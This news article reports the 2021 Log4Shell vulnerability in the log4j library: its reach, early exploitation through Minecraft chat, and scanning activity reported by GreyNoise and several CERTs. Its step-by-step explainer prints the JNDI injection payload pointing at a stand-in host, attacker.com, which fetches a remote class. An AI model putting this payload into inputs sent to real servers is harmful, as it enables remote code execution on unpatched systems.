Computer security teams all around the world are scrambling to patch a previously unknown vulnerability called Log4Shell, which has the potential to let hackers compromise millions of devices across the internet.
The nature of the vulnerability allows remote code execution on vulnerable servers, giving an attacker the ability to import malware that would completely compromise machines.
The vulnerability is found in log4j, an open-source logging library used by apps and services across the internet. Logging is a process where applications keep a running list of activities they have performed which can later be reviewed in case of error.
Almost every network security system runs some kind of logging process, which gives popular libraries like log4j an enormous reach.
The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages.
A tweet from security analysis company GreyNoise reported that the company has already detected numerous servers searching the internet for machines vulnerable to the exploit.
GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. https://t.co/JF3tUkpIrq pic.twitter.com/CTMi0IWQ5j
— GreyNoise (@GreyNoiseIO) December 10, 2021
Below is a step-by-step example of how Log4Shell can be exploited on vulnerable servers:
- Data from the User gets sent to the server, it can be via HTTP or any other protocol
- The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
- The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via “Java Naming and Directory Interface” (JNDI),
- This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
- This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Researchers say they found evidence that Log4Shell can be exploited in servers operated by Apple, Cloudflare, Twitter, Valve, Tencent, and other large companies. The vulnerability is said to be particularly easy to exploit in Minecraft servers, too, with some proof-of-concept attacks using nothing more than the in-game chat.
The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom’s CERT, the Greynoise security firm, and others have all reported that attackers are actively looking for servers vulnerable to Log4Shell attacks.
